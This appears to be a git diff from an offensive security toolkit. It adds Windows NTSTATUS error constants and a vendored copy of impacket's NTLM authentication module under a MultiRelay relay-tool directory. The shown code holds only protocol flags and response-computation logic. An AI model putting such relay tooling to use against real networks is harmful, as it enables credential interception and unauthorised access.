+STATUS_GRAPHICS_INVALID_FREQUENCY = 0xC01E030A
+STATUS_GRAPHICS_INVALID_ACTIVE_REGION = 0xC01E030B
+STATUS_GRAPHICS_INVALID_TOTAL_REGION = 0xC01E030C
+STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE = 0xC01E0310
+STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE = 0xC01E0311
+STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET = 0xC01E0312
+STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY = 0xC01E0313
+STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET = 0xC01E0314
+STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET = 0xC01E0315
+STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET = 0xC01E0316
+STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET = 0xC01E0317
+STATUS_GRAPHICS_TARGET_ALREADY_IN_SET = 0xC01E0318
+STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH = 0xC01E0319
+STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY = 0xC01E031A
+STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET = 0xC01E031B
+STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE = 0xC01E031C
+STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET = 0xC01E031D
+STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET = 0xC01E031F
+STATUS_GRAPHICS_STALE_MODESET = 0xC01E0320
+STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET = 0xC01E0321
+STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE = 0xC01E0322
+STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN = 0xC01E0323
+STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE = 0xC01E0324
+STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION = 0xC01E0325
+STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES = 0xC01E0326
+STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY = 0xC01E0327
+STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE = 0xC01E0328
+STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET = 0xC01E0329
+STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET = 0xC01E032A
+STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR = 0xC01E032B
+STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET = 0xC01E032C
+STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET = 0xC01E032D
+STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE = 0xC01E032E
+STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE = 0xC01E032F
+STATUS_GRAPHICS_RESOURCES_NOT_RELATED = 0xC01E0330
+STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE = 0xC01E0331
+STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE = 0xC01E0332
+STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET = 0xC01E0333
+STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER = 0xC01E0334
+STATUS_GRAPHICS_NO_VIDPNMGR = 0xC01E0335
+STATUS_GRAPHICS_NO_ACTIVE_VIDPN = 0xC01E0336
+STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY = 0xC01E0337
+STATUS_GRAPHICS_MONITOR_NOT_CONNECTED = 0xC01E0338
+STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY = 0xC01E0339
+STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE = 0xC01E033A
+STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE = 0xC01E033B
+STATUS_GRAPHICS_INVALID_STRIDE = 0xC01E033C
+STATUS_GRAPHICS_INVALID_PIXELFORMAT = 0xC01E033D
+STATUS_GRAPHICS_INVALID_COLORBASIS = 0xC01E033E
+STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE = 0xC01E033F
+STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY = 0xC01E0340
+STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT = 0xC01E0341
+STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE = 0xC01E0342
+STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN = 0xC01E0343
+STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL = 0xC01E0344
+STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION = 0xC01E0345
+STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED = 0xC01E0346
+STATUS_GRAPHICS_INVALID_GAMMA_RAMP = 0xC01E0347
+STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED = 0xC01E0348
+STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED = 0xC01E0349
+STATUS_GRAPHICS_MODE_NOT_IN_MODESET = 0xC01E034A
+STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON = 0xC01E034D
+STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE = 0xC01E034E
+STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE = 0xC01E034F
+STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS = 0xC01E0350
+STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING = 0xC01E0352
+STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED = 0xC01E0353
+STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS = 0xC01E0354
+STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT = 0xC01E0355
+STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM = 0xC01E0356
+STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN = 0xC01E0357
+STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT = 0xC01E0358
+STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED = 0xC01E0359
+STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION = 0xC01E035A
+STATUS_GRAPHICS_INVALID_CLIENT_TYPE = 0xC01E035B
+STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET = 0xC01E035C
+STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED = 0xC01E0400
+STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED = 0xC01E0401
+STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER = 0xC01E0430
+STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED = 0xC01E0431
+STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED = 0xC01E0432
+STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY = 0xC01E0433
+STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED = 0xC01E0434
+STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON = 0xC01E0435
+STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE = 0xC01E0436
+STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER = 0xC01E0438
+STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED = 0xC01E043B
+STATUS_GRAPHICS_OPM_NOT_SUPPORTED = 0xC01E0500
+STATUS_GRAPHICS_COPP_NOT_SUPPORTED = 0xC01E0501
+STATUS_GRAPHICS_UAB_NOT_SUPPORTED = 0xC01E0502
+STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS = 0xC01E0503
+STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL = 0xC01E0504
+STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST = 0xC01E0505
+STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME = 0xC01E0506
+STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP = 0xC01E0507
+STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED = 0xC01E0508
+STATUS_GRAPHICS_OPM_INVALID_POINTER = 0xC01E050A
+STATUS_GRAPHICS_OPM_INTERNAL_ERROR = 0xC01E050B
+STATUS_GRAPHICS_OPM_INVALID_HANDLE = 0xC01E050C
+STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE = 0xC01E050D
+STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH = 0xC01E050E
+STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED = 0xC01E050F
+STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED = 0xC01E0510
+STATUS_GRAPHICS_PVP_HFS_FAILED = 0xC01E0511
+STATUS_GRAPHICS_OPM_INVALID_SRM = 0xC01E0512
+STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP = 0xC01E0513
+STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP = 0xC01E0514
+STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA = 0xC01E0515
+STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET = 0xC01E0516
+STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH = 0xC01E0517
+STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE = 0xC01E0518
+STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS = 0xC01E051A
+STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS = 0xC01E051B
+STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS = 0xC01E051C
+STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST = 0xC01E051D
+STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR = 0xC01E051E
+STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS = 0xC01E051F
+STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED = 0xC01E0520
+STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST = 0xC01E0521
+STATUS_GRAPHICS_I2C_NOT_SUPPORTED = 0xC01E0580
+STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST = 0xC01E0581
+STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA = 0xC01E0582
+STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA = 0xC01E0583
+STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED = 0xC01E0584
+STATUS_GRAPHICS_DDCCI_INVALID_DATA = 0xC01E0585
+STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE = 0xC01E0586
+STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING = 0xC01E0587
+STATUS_GRAPHICS_MCA_INTERNAL_ERROR = 0xC01E0588
+STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND = 0xC01E0589
+STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH = 0xC01E058A
+STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM = 0xC01E058B
+STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE = 0xC01E058C
+STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS = 0xC01E058D
+STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED = 0xC01E05E0
+STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME = 0xC01E05E1
+STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP = 0xC01E05E2
+STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED = 0xC01E05E3
+STATUS_GRAPHICS_INVALID_POINTER = 0xC01E05E4
+STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE = 0xC01E05E5
+STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL = 0xC01E05E6
+STATUS_GRAPHICS_INTERNAL_ERROR = 0xC01E05E7
+STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS = 0xC01E05E8
+STATUS_FVE_LOCKED_VOLUME = 0xC0210000
+STATUS_FVE_NOT_ENCRYPTED = 0xC0210001
+STATUS_FVE_BAD_INFORMATION = 0xC0210002
+STATUS_FVE_TOO_SMALL = 0xC0210003
+STATUS_FVE_FAILED_WRONG_FS = 0xC0210004
+STATUS_FVE_FAILED_BAD_FS = 0xC0210005
+STATUS_FVE_FS_NOT_EXTENDED = 0xC0210006
+STATUS_FVE_FS_MOUNTED = 0xC0210007
+STATUS_FVE_NO_LICENSE = 0xC0210008
+STATUS_FVE_ACTION_NOT_ALLOWED = 0xC0210009
+STATUS_FVE_BAD_DATA = 0xC021000A
+STATUS_FVE_VOLUME_NOT_BOUND = 0xC021000B
+STATUS_FVE_NOT_DATA_VOLUME = 0xC021000C
+STATUS_FVE_CONV_READ_ERROR = 0xC021000D
+STATUS_FVE_CONV_WRITE_ERROR = 0xC021000E
+STATUS_FVE_OVERLAPPED_UPDATE = 0xC021000F
+STATUS_FVE_FAILED_SECTOR_SIZE = 0xC0210010
+STATUS_FVE_FAILED_AUTHENTICATION = 0xC0210011
+STATUS_FVE_NOT_OS_VOLUME = 0xC0210012
+STATUS_FVE_KEYFILE_NOT_FOUND = 0xC0210013
+STATUS_FVE_KEYFILE_INVALID = 0xC0210014
+STATUS_FVE_KEYFILE_NO_VMK = 0xC0210015
+STATUS_FVE_TPM_DISABLED = 0xC0210016
+STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO = 0xC0210017
+STATUS_FVE_TPM_INVALID_PCR = 0xC0210018
+STATUS_FVE_TPM_NO_VMK = 0xC0210019
+STATUS_FVE_PIN_INVALID = 0xC021001A
+STATUS_FVE_AUTH_INVALID_APPLICATION = 0xC021001B
+STATUS_FVE_AUTH_INVALID_CONFIG = 0xC021001C
+STATUS_FVE_DEBUGGER_ENABLED = 0xC021001D
+STATUS_FVE_DRY_RUN_FAILED = 0xC021001E
+STATUS_FVE_BAD_METADATA_POINTER = 0xC021001F
+STATUS_FVE_OLD_METADATA_COPY = 0xC0210020
+STATUS_FVE_REBOOT_REQUIRED = 0xC0210021
+STATUS_FVE_RAW_ACCESS = 0xC0210022
+STATUS_FVE_RAW_BLOCKED = 0xC0210023
+STATUS_FVE_NO_FEATURE_LICENSE = 0xC0210026
+STATUS_FVE_POLICY_USER_DISABLE_RDV_NOT_ALLOWED = 0xC0210027
+STATUS_FVE_CONV_RECOVERY_FAILED = 0xC0210028
+STATUS_FVE_VIRTUALIZED_SPACE_TOO_BIG = 0xC0210029
+STATUS_FVE_VOLUME_TOO_SMALL = 0xC0210030
+STATUS_FWP_CALLOUT_NOT_FOUND = 0xC0220001
+STATUS_FWP_CONDITION_NOT_FOUND = 0xC0220002
+STATUS_FWP_FILTER_NOT_FOUND = 0xC0220003
+STATUS_FWP_LAYER_NOT_FOUND = 0xC0220004
+STATUS_FWP_PROVIDER_NOT_FOUND = 0xC0220005
+STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND = 0xC0220006
+STATUS_FWP_SUBLAYER_NOT_FOUND = 0xC0220007
+STATUS_FWP_NOT_FOUND = 0xC0220008
+STATUS_FWP_ALREADY_EXISTS = 0xC0220009
+STATUS_FWP_IN_USE = 0xC022000A
+STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS = 0xC022000B
+STATUS_FWP_WRONG_SESSION = 0xC022000C
+STATUS_FWP_NO_TXN_IN_PROGRESS = 0xC022000D
+STATUS_FWP_TXN_IN_PROGRESS = 0xC022000E
+STATUS_FWP_TXN_ABORTED = 0xC022000F
+STATUS_FWP_SESSION_ABORTED = 0xC0220010
+STATUS_FWP_INCOMPATIBLE_TXN = 0xC0220011
+STATUS_FWP_TIMEOUT = 0xC0220012
+STATUS_FWP_NET_EVENTS_DISABLED = 0xC0220013
+STATUS_FWP_INCOMPATIBLE_LAYER = 0xC0220014
+STATUS_FWP_KM_CLIENTS_ONLY = 0xC0220015
+STATUS_FWP_LIFETIME_MISMATCH = 0xC0220016
+STATUS_FWP_BUILTIN_OBJECT = 0xC0220017
+STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS = 0xC0220018
+STATUS_FWP_TOO_MANY_CALLOUTS = 0xC0220018
+STATUS_FWP_NOTIFICATION_DROPPED = 0xC0220019
+STATUS_FWP_TRAFFIC_MISMATCH = 0xC022001A
+STATUS_FWP_INCOMPATIBLE_SA_STATE = 0xC022001B
+STATUS_FWP_NULL_POINTER = 0xC022001C
+STATUS_FWP_INVALID_ENUMERATOR = 0xC022001D
+STATUS_FWP_INVALID_FLAGS = 0xC022001E
+STATUS_FWP_INVALID_NET_MASK = 0xC022001F
+STATUS_FWP_INVALID_RANGE = 0xC0220020
+STATUS_FWP_INVALID_INTERVAL = 0xC0220021
+STATUS_FWP_ZERO_LENGTH_ARRAY = 0xC0220022
+STATUS_FWP_NULL_DISPLAY_NAME = 0xC0220023
+STATUS_FWP_INVALID_ACTION_TYPE = 0xC0220024
+STATUS_FWP_INVALID_WEIGHT = 0xC0220025
+STATUS_FWP_MATCH_TYPE_MISMATCH = 0xC0220026
+STATUS_FWP_TYPE_MISMATCH = 0xC0220027
+STATUS_FWP_OUT_OF_BOUNDS = 0xC0220028
+STATUS_FWP_RESERVED = 0xC0220029
+STATUS_FWP_DUPLICATE_CONDITION = 0xC022002A
+STATUS_FWP_DUPLICATE_KEYMOD = 0xC022002B
+STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER = 0xC022002C
+STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER = 0xC022002D
+STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER = 0xC022002E
+STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT = 0xC022002F
+STATUS_FWP_INCOMPATIBLE_AUTH_METHOD = 0xC0220030
+STATUS_FWP_INCOMPATIBLE_DH_GROUP = 0xC0220031
+STATUS_FWP_EM_NOT_SUPPORTED = 0xC0220032
+STATUS_FWP_NEVER_MATCH = 0xC0220033
+STATUS_FWP_PROVIDER_CONTEXT_MISMATCH = 0xC0220034
+STATUS_FWP_INVALID_PARAMETER = 0xC0220035
+STATUS_FWP_TOO_MANY_SUBLAYERS = 0xC0220036
+STATUS_FWP_CALLOUT_NOTIFICATION_FAILED = 0xC0220037
+STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG = 0xC0220038
+STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG = 0xC0220039
+STATUS_FWP_DUPLICATE_AUTH_METHOD = 0xC022003C
+STATUS_FWP_TCPIP_NOT_READY = 0xC0220100
+STATUS_FWP_INJECT_HANDLE_CLOSING = 0xC0220101
+STATUS_FWP_INJECT_HANDLE_STALE = 0xC0220102
+STATUS_FWP_CANNOT_PEND = 0xC0220103
+STATUS_NDIS_CLOSING = 0xC0230002
+STATUS_NDIS_BAD_VERSION = 0xC0230004
+STATUS_NDIS_BAD_CHARACTERISTICS = 0xC0230005
+STATUS_NDIS_ADAPTER_NOT_FOUND = 0xC0230006
+STATUS_NDIS_OPEN_FAILED = 0xC0230007
+STATUS_NDIS_DEVICE_FAILED = 0xC0230008
+STATUS_NDIS_MULTICAST_FULL = 0xC0230009
+STATUS_NDIS_MULTICAST_EXISTS = 0xC023000A
+STATUS_NDIS_MULTICAST_NOT_FOUND = 0xC023000B
+STATUS_NDIS_REQUEST_ABORTED = 0xC023000C
+STATUS_NDIS_RESET_IN_PROGRESS = 0xC023000D
+STATUS_NDIS_INVALID_PACKET = 0xC023000F
+STATUS_NDIS_INVALID_DEVICE_REQUEST = 0xC0230010
+STATUS_NDIS_ADAPTER_NOT_READY = 0xC0230011
+STATUS_NDIS_INVALID_LENGTH = 0xC0230014
+STATUS_NDIS_INVALID_DATA = 0xC0230015
+STATUS_NDIS_BUFFER_TOO_SHORT = 0xC0230016
+STATUS_NDIS_INVALID_OID = 0xC0230017
+STATUS_NDIS_ADAPTER_REMOVED = 0xC0230018
+STATUS_NDIS_UNSUPPORTED_MEDIA = 0xC0230019
+STATUS_NDIS_GROUP_ADDRESS_IN_USE = 0xC023001A
+STATUS_NDIS_FILE_NOT_FOUND = 0xC023001B
+STATUS_NDIS_ERROR_READING_FILE = 0xC023001C
+STATUS_NDIS_ALREADY_MAPPED = 0xC023001D
+STATUS_NDIS_RESOURCE_CONFLICT = 0xC023001E
+STATUS_NDIS_MEDIA_DISCONNECTED = 0xC023001F
+STATUS_NDIS_INVALID_ADDRESS = 0xC0230022
+STATUS_NDIS_PAUSED = 0xC023002A
+STATUS_NDIS_INTERFACE_NOT_FOUND = 0xC023002B
+STATUS_NDIS_UNSUPPORTED_REVISION = 0xC023002C
+STATUS_NDIS_INVALID_PORT = 0xC023002D
+STATUS_NDIS_INVALID_PORT_STATE = 0xC023002E
+STATUS_NDIS_LOW_POWER_STATE = 0xC023002F
+STATUS_NDIS_NOT_SUPPORTED = 0xC02300BB
+STATUS_NDIS_OFFLOAD_POLICY = 0xC023100F
+STATUS_NDIS_OFFLOAD_CONNECTION_REJECTED = 0xC0231012
+STATUS_NDIS_OFFLOAD_PATH_REJECTED = 0xC0231013
+STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED = 0xC0232000
+STATUS_NDIS_DOT11_MEDIA_IN_USE = 0xC0232001
+STATUS_NDIS_DOT11_POWER_STATE_INVALID = 0xC0232002
+STATUS_NDIS_PM_WOL_PATTERN_LIST_FULL = 0xC0232003
+STATUS_NDIS_PM_PROTOCOL_OFFLOAD_LIST_FULL = 0xC0232004
+STATUS_IPSEC_BAD_SPI = 0xC0360001
+STATUS_IPSEC_SA_LIFETIME_EXPIRED = 0xC0360002
+STATUS_IPSEC_WRONG_SA = 0xC0360003
+STATUS_IPSEC_REPLAY_CHECK_FAILED = 0xC0360004
+STATUS_IPSEC_INVALID_PACKET = 0xC0360005
+STATUS_IPSEC_INTEGRITY_CHECK_FAILED = 0xC0360006
+STATUS_IPSEC_CLEAR_TEXT_DROP = 0xC0360007
+STATUS_IPSEC_AUTH_FIREWALL_DROP = 0xC0360008
+STATUS_IPSEC_THROTTLE_DROP = 0xC0360009
+STATUS_IPSEC_DOSP_BLOCK = 0xC0368000
+STATUS_IPSEC_DOSP_RECEIVED_MULTICAST = 0xC0368001
+STATUS_IPSEC_DOSP_INVALID_PACKET = 0xC0368002
+STATUS_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0xC0368003
+STATUS_IPSEC_DOSP_MAX_ENTRIES = 0xC0368004
+STATUS_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0xC0368005
+STATUS_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0xC0368006
+STATUS_VOLMGR_MIRROR_NOT_SUPPORTED = 0xC038005B
+STATUS_VOLMGR_RAID5_NOT_SUPPORTED = 0xC038005C
+STATUS_VIRTDISK_PROVIDER_NOT_FOUND = 0xC03A0014
+STATUS_VIRTDISK_NOT_VIRTUAL_DISK = 0xC03A0015
+STATUS_VHD_PARENT_VHD_ACCESS_DENIED = 0xC03A0016
+STATUS_VHD_CHILD_PARENT_SIZE_MISMATCH = 0xC03A0017
+STATUS_VHD_DIFFERENCING_CHAIN_CYCLE_DETECTED = 0xC03A0018
+STATUS_VHD_DIFFERENCING_CHAIN_ERROR_IN_PARENT = 0xC03A0019
diff --git a/tools/MultiRelay/impacket-dev/impacket/ntlm.py b/tools/MultiRelay/impacket-dev/impacket/ntlm.py
new file mode 100644
index 0000000..9c64ff5
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/ntlm.py
@@ -0,0 +1,976 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+from __future__ import division
+from __future__ import print_function
+import base64
+import struct
+import calendar
+import time
+import hashlib
+import random
+import string
+import binascii
+from six import b
+
+from impacket.structure import Structure
+from impacket import LOG
+
+
+# This is important. NTLMv2 is not negotiated by the client or server.
+# It is used if set locally on both sides. Change this item if you don't want to use
+# NTLMv2 by default and fall back to NTLMv1 (with EXTENDED_SESSION_SECURITY or not)
+# Check the following links:
+# https://davenport.sourceforge.io/ntlm.html
+# https://blogs.msdn.microsoft.com/openspecification/2010/04/19/ntlm-keys-and-sundry-stuff/
+# https://social.msdn.microsoft.com/Forums/c8f488ed-1b96-4e06-bd65-390aa41138d1/msnlmp-msntht-determining-ntlm-v1-or-v2-in-http-authentication?forum=os_specifications
+# So I'm setting a global variable to control this, this can also be set programmatically
+
+USE_NTLMv2 = True # if false will fall back to NTLMv1 (or NTLMv1 with ESS a.k.a NTLM2)
+TEST_CASE = False # Only set to True when running Test Cases
+
+
+def computeResponse(flags, serverChallenge, clientChallenge, serverName, domain, user, password, lmhash='', nthash='',
+ use_ntlmv2=USE_NTLMv2):
+ if use_ntlmv2:
+ return computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
+ lmhash, nthash, use_ntlmv2=use_ntlmv2)
+ else:
+ return computeResponseNTLMv1(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
+ lmhash, nthash, use_ntlmv2=use_ntlmv2)
+try:
+ from Cryptodome.Cipher import ARC4
+ from Cryptodome.Cipher import DES
+ from Cryptodome.Hash import MD4
+except Exception:
+ LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
+ LOG.critical("See https://pypi.org/project/pycryptodomex/")
+
+NTLM_AUTH_NONE = 1
+NTLM_AUTH_CONNECT = 2
+NTLM_AUTH_CALL = 3
+NTLM_AUTH_PKT = 4
+NTLM_AUTH_PKT_INTEGRITY = 5
+NTLM_AUTH_PKT_PRIVACY = 6
+
+# If set, requests 56-bit encryption. If the client sends NTLMSSP_NEGOTIATE_SEAL or NTLMSSP_NEGOTIATE_SIGN
+# with NTLMSSP_NEGOTIATE_56 to the server in the NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_56 to
+# the client in the CHALLENGE_MESSAGE. Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128
+# are requested and supported by the client and server, NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be
+# returned to the client. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set NTLMSSP_NEGOTIATE_56 if it is
+# supported. An alternate name for this field is NTLMSSP_NEGOTIATE_56.
+NTLMSSP_NEGOTIATE_56 = 0x80000000
+
+# If set, requests an explicit key exchange. This capability SHOULD be used because it improves security for message
+# integrity or confidentiality. See sections 3.2.5.1.2, 3.2.5.2.1, and 3.2.5.2.2 for details. An alternate name for
+# this field is NTLMSSP_NEGOTIATE_KEY_EXCH.
+NTLMSSP_NEGOTIATE_KEY_EXCH = 0x40000000
+
+# If set, requests 128-bit session key negotiation. An alternate name for this field is NTLMSSP_NEGOTIATE_128.
+# If the client sends NTLMSSP_NEGOTIATE_128 to the server in the NEGOTIATE_MESSAGE, the server MUST return
+# NTLMSSP_NEGOTIATE_128 to the client in the CHALLENGE_MESSAGE only if the client sets NTLMSSP_NEGOTIATE_SEAL or
+# NTLMSSP_NEGOTIATE_SIGN. Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 are
+# requested and supported by the client and server, NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be
+# returned to the client. Clients and servers that set NTLMSSP_NEGOTIATE_SEAL SHOULD set NTLMSSP_NEGOTIATE_128 if it
+# is supported. An alternate name for this field is NTLMSSP_NEGOTIATE_128
+NTLMSSP_NEGOTIATE_128 = 0x20000000
+
+NTLMSSP_RESERVED_1 = 0x10000000
+NTLMSSP_RESERVED_2 = 0x08000000
+NTLMSSP_RESERVED_3 = 0x04000000
+
+# If set, requests the protocol version number. The data corresponding to this flag is provided in the Version field
+# of the NEGOTIATE_MESSAGE, the CHALLENGE_MESSAGE, and the AUTHENTICATE_MESSAGE.<22> An alternate name for this field
+# is NTLMSSP_NEGOTIATE_VERSION
+NTLMSSP_NEGOTIATE_VERSION = 0x02000000
+NTLMSSP_RESERVED_4 = 0x01000000
+
+# If set, indicates that the TargetInfo fields in the CHALLENGE_MESSAGE (section 2.2.1.2) are populated.
+# An alternate name for this field is NTLMSSP_NEGOTIATE_TARGET_INFO.
+NTLMSSP_NEGOTIATE_TARGET_INFO = 0x00800000
+
+# If set, requests the usage of the LMOWF (section 3.3). An alternate name for this field is
+# NTLMSSP_REQUEST_NON_NT_SESSION_KEY.
+NTLMSSP_REQUEST_NON_NT_SESSION_KEY = 0x00400000
+NTLMSSP_RESERVED_5 = 0x00200000
+
